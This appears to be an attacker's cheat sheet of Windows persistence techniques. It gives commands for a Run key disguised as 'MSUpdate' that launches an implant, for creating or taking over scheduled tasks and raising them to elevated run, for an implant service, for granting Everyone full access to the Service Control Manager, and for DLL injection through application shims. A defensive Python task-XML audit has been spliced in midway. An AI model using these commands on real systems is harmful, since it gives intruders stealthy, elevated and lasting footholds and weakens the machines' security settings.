High Priv User

Persistence techniques for a high-privileged user

Reg Keys:

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d "C:\Windows\Tasks\implant.exe" /f

Scheduled Tasks:

Create New Task:

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create

# normal @ 09:00 daily
schtasks /create /tn "MyTask\Go" /sc daily /st 09:00 /tr "C:\windows\tasks\implant.exe"
# normal @ every 15 minutes
schtasks /create /tn "MyTask\Go" /sc minute /mo 15 /tr "C:\windows\tasks\implant.exe"
# normal @ every 3 hours between 09:00 and 17:00 (/et is the end-time switch; there is no /etu)
schtasks /create /tn "MyTask\Go" /sc hourly /mo 3 /st 09:00 /et 17:00 /tr "C:\windows\tasks\implant.exe"


# query
schtasks /query /tn "MyTask\Go" /fo list /v
# run
schtasks /run /tn "MyTask\Go"
# delete
schtasks /delete /tn "MyTask\Go"

To make the task run in an elevated session, modify its definition. First export the task XML with schtasks:

schtasks /query /tn "MyTask\Go" /xml > task.xml

Inside the `<Principal>` element of the `<Principals></Principals>` section add `<RunLevel>HighestAvailable</RunLevel>`, then delete the original task and re-create it from the edited file:

# delete the original task
schtasks /delete /f /tn "MyTask\Go"
# create the new task from the edited XML
schtasks /create /tn "MyTask\Go" /xml task.xml
# query
schtasks /query /tn "MyTask\Go" /v /xml

Take over an existing task / multiple actions:

# export the existing task:
schtasks /query /tn "MyTask\Go" /xml > task.xml

# add to the <Actions></Actions> section of the XML file (tag names are case-sensitive)
<Exec>
    <Command>C:\windows\tasks\implant.exe</Command>
</Exec>

# delete the task
schtasks /delete /tn "MyTask\Go" /f
# re-create it from the edited XML
schtasks /create /tn "MyTask\Go" /xml task.xml
# verify: the "Task To Run" field should now list both actions
schtasks /query /tn "MyTask\Go" /fo list /v
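As an added example (not part of these notes), the following Python audit parses an exported task definition the same XML structure the two procedures above edit: it reads `<RunLevel>` under `<Principals>/<Principal>`, lists the `<Exec>` entries under `<Actions>`, and flags the combinations those procedures produce. The sample task XML is constructed, not a real export; `strip_declaration` and `audit_task_xml` are names chosen here.

```python
import xml.etree.ElementTree as ET

# Namespace of every Task Scheduler definition exported by schtasks /query /xml.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample (not a real export): a daily backup task edited the way
# the notes above describe, RunLevel raised to HighestAvailable and a second
# <Exec> appended to <Actions>.
SAMPLE_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>CORP\svc-backup</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T09:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author">
    <UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel>
  </Principal></Principals>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\Backup\backup.exe</Command><Arguments>/daily</Arguments></Exec>
    <Exec><Command>C:\windows\tasks\implant.exe</Command></Exec>
  </Actions>
</Task>"""


def strip_declaration(text: str) -> str:
    """schtasks exports are UTF-16 with an XML declaration; once decoded to str,
    ElementTree rejects a multi-byte encoding declaration, so drop it."""
    head = text.lstrip()
    if head.startswith("<?xml"):
        return head[head.index("?>") + 2:].lstrip()
    return head


def audit_task_xml(xml_text: str) -> dict:
    """Return the task's run level, its Exec commands and reviewer findings."""
    root = ET.fromstring(strip_declaration(xml_text))
    # Task Scheduler treats a missing <RunLevel> as LeastPrivilege.
    run_level = root.findtext("t:Principals/t:Principal/t:RunLevel",
                              default="LeastPrivilege", namespaces=NS)
    commands = [e.findtext("t:Command", default="", namespaces=NS)
                for e in root.findall("t:Actions/t:Exec", NS)]
    findings = []
    if run_level == "HighestAvailable":
        findings.append("runs elevated: RunLevel is HighestAvailable")
    if len(commands) > 1:
        findings.append(f"{len(commands)} Exec actions: task may have been taken over")
    for cmd in commands:
        # C:\Windows\Tasks is the drop location used throughout these notes.
        if cmd.lower().startswith("c:\\windows\\tasks\\"):
            findings.append(f"command under C:\\Windows\\Tasks: {cmd}")
    return {"run_level": run_level, "commands": commands, "findings": findings}
```

Run it over each file produced by `schtasks /query /xml` (decoded with the utf-16 codec) and review any task that returns a non-empty findings list.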

Service:

Create a new service:

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create

# create new service (sc requires a space after each "=")
sc create SERVICE_NAME binpath= "C:\Windows\Tasks\implant.exe" start= auto
# query
sc query SERVICE_NAME
# start
sc start SERVICE_NAME

Starting it will report an error, because the binary never registers with the Service Control Manager, but the executable still runs. It is advisable to build a proper service binary instead. The command below rewrites the Service Control Manager's security descriptor so that Everyone (WD) has full access (KA); `sc sdshow scmanager` prints the current descriptor, which is how such a change is found in an audit:

sc.exe sdset scmanager D:(A;;KA;;;WD)

Application Shimming:

The x86 version is more capable than the x64 one, so use the 32-bit Compatibility Administrator. From cmd, run:

compatadmin.exe /x

Right-click 'New Database > New', give it any name, set vendor = Microsoft, and select a suitable 32-bit Windows program as the target. Under compatibility fixes select InjectDLL and point it to your compiled DLL. Click Save.
